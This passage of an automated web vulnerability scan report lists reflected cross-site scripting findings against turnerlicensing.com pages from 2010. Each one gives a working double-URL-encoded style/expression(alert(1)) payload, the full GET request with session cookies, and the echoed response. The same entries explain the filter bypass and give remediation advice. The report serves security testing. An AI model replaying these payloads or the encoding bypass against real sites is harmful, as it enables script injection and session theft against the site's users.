Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:08 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:07 GMT
NS_RTIMER_COMPOSITE: 1666333946:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=986
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 94901


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Boston Celtics</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scr
...[SNIP]...
turnerlicensing.com/s.nl?sc=69&category=144026&d38e8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278d6ba417d1b=1&d38e8%27style%3d%27x%3aexpression%28alert%281%29%29%278d6ba417d1b=1&d38e8'style='x:expression(alert(1))'8d6ba417d1b=1&fromsla=T'>
...[SNIP]...

2.167. http://www.turnerlicensing.com/NFL [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NFL

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4bff4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527467f646483f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4bff4'style='x:expression(alert(1))'467f646483f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NFL?4bff4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527467f646483f=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:28 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:27 GMT
NS_RTIMER_COMPOSITE: -1590895309:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=945
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 58596


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>NFL</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<scrip
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=67&4bff4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527467f646483f=1&4bff4'style='x:expression(alert(1))'467f646483f=1&4bff4%27style%3d%27x%3aexpression%28alert%281%29%29%27467f646483f=1&fromsla=T'>
...[SNIP]...

2.168. http://www.turnerlicensing.com/NHL [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NHL

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9c378%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252755966d0d35d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9c378'style='x:expression(alert(1))'55966d0d35d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NHL?9c378%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252755966d0d35d=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:28 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:27 GMT
NS_RTIMER_COMPOSITE: -109262757:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=941
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 58337


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>NHL</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<scrip
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=70&9c378%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252755966d0d35d=1&9c378'style='x:expression(alert(1))'55966d0d35d=1&9c378%27style%3d%27x%3aexpression%28alert%281%29%29%2755966d0d35d=1&fromsla=T'>
...[SNIP]...

2.169. http://www.turnerlicensing.com/Players [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /Players

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 830e5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252765ac4008624 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 830e5'style='x:expression(alert(1))'65ac4008624 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Players?830e5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252765ac4008624=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:36 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:34 GMT
NS_RTIMER_COMPOSITE: 1114186826:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=555
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 63359


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Players</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<s
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=72&830e5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252765ac4008624=1&830e5'style='x:expression(alert(1))'65ac4008624=1&830e5%27style%3d%27x%3aexpression%28alert%281%29%29%2765ac4008624=1&fromsla=T'>
...[SNIP]...

2.170. http://www.turnerlicensing.com/Stadiums [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /Stadiums

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4c355%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272ca472c83b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4c355'style='x:expression(alert(1))'2ca472c83b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Stadiums?4c355%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272ca472c83b2=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:36 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:34 GMT
NS_RTIMER_COMPOSITE: -1255247182:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=981
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 89698


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Stadiums</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
lue='http://www.turnerlicensing.com/s.nl?sc=73&4c355%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272ca472c83b2=1&4c355%27style%3d%27x%3aexpression%28alert%281%29%29%272ca472c83b2=1&4c355'style='x:expression(alert(1))'2ca472c83b2=1&fromsla=T'>
...[SNIP]...

2.171. http://www.turnerlicensing.com/Turner-Contact-Us [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /Turner-Contact-Us

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6dd9c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277f7d614df6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6dd9c'style='x:expression(alert(1))'7f7d614df6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Turner-Contact-Us?6dd9c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277f7d614df6b=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:48 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1590873402:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=947
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 33583


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>TURNER - Contact Us</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...
...[SNIP]...
.turnerlicensing.com/s.nl?it=I&id=86&6dd9c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277f7d614df6b=1&6dd9c%27style%3d%27x%3aexpression%28alert%281%29%29%277f7d614df6b=1&fromsla=T&6dd9c'style='x:expression(alert(1))'7f7d614df6b=1'>
...[SNIP]...

2.172. http://www.turnerlicensing.com/Turner-Email-Sign-Up [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /Turner-Email-Sign-Up

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 41989%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527cc1e08c1a24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 41989'style='x:expression(alert(1))'cc1e08c1a24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is specific to older versions of Internet Explorer (IE7 and earlier, or later versions rendering in compatibility mode) and will not run in other browsers; the attribute breakout itself, the single quote that closes the attribute value, is not browser-specific, only the payload chosen to exploit it is.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Turner-Email-Sign-Up?41989%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527cc1e08c1a24=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:48 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -811326705:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=863
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 33500


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>TURNER - Email Sign Up</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading
...[SNIP]...
http://www.turnerlicensing.com/s.nl?it=I&id=87&41989%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527cc1e08c1a24=1&41989%27style%3d%27x%3aexpression%28alert%281%29%29%27cc1e08c1a24=1&41989'style='x:expression(alert(1))'cc1e08c1a24=1&fromsla=T'>
...[SNIP]...

2.173. http://www.turnerlicensing.com/book_covers [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /book_covers

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c755e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f5f16d43fab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c755e'style='x:expression(alert(1))'f5f16d43fab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is specific to older versions of Internet Explorer (IE7 and earlier, or later versions rendering in compatibility mode) and will not run in other browsers; the attribute breakout itself, the single quote that closes the attribute value, is not browser-specific, only the payload chosen to exploit it is.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /book_covers?c755e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f5f16d43fab=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:23 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1222437526:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=954
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100201


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Book Covers</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=175964&c755e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f5f16d43fab=1&c755e'style='x:expression(alert(1))'f5f16d43fab=1&c755e%27style%3d%27x%3aexpression%28alert%281%29%29%27f5f16d43fab=1&fromsla=T'>
...[SNIP]...

2.174. http://www.turnerlicensing.com/box_calendars [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /box_calendars

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 45e75%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275e5156453d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 45e75'style='x:expression(alert(1))'5e5156453d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is specific to older versions of Internet Explorer (IE7 and earlier, or later versions rendering in compatibility mode) and will not run in other browsers; the attribute breakout itself, the single quote that closes the attribute value, is not browser-specific, only the payload chosen to exploit it is.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /box_calendars?45e75%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275e5156453d=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:22 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1666338165:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=997
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100396


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Box Calendars</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scri
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=338446&45e75%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275e5156453d=1&fromsla=T&45e75'style='x:expression(alert(1))'5e5156453d=1&45e75%27style%3d%27x%3aexpression%28alert%281%29%29%275e5156453d=1'>
...[SNIP]...

2.175. http://www.turnerlicensing.com/composition_books [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /composition_books

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 68ea5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272936e399c82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68ea5'style='x:expression(alert(1))'2936e399c82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is specific to older versions of Internet Explorer (IE7 and earlier, or later versions rendering in compatibility mode) and will not run in other browsers; the attribute breakout itself, the single quote that closes the attribute value, is not browser-specific, only the payload chosen to exploit it is.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /composition_books?68ea5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272936e399c82=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:26 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -259193890:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=592
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100546


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Composition Books</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=175955&68ea5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272936e399c82=1&68ea5'style='x:expression(alert(1))'2936e399c82=1&68ea5%27style%3d%27x%3aexpression%28alert%281%29%29%272936e399c82=1&fromsla=T'>
...[SNIP]...

2.176. http://www.turnerlicensing.com/desk_calendars [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /desk_calendars

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6de83%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275840fdf7ac4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6de83'style='x:expression(alert(1))'5840fdf7ac4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is specific to older versions of Internet Explorer (IE7 and earlier, or later versions rendering in compatibility mode) and will not run in other browsers; the attribute breakout itself, the single quote that closes the attribute value, is not browser-specific, only the payload chosen to exploit it is.

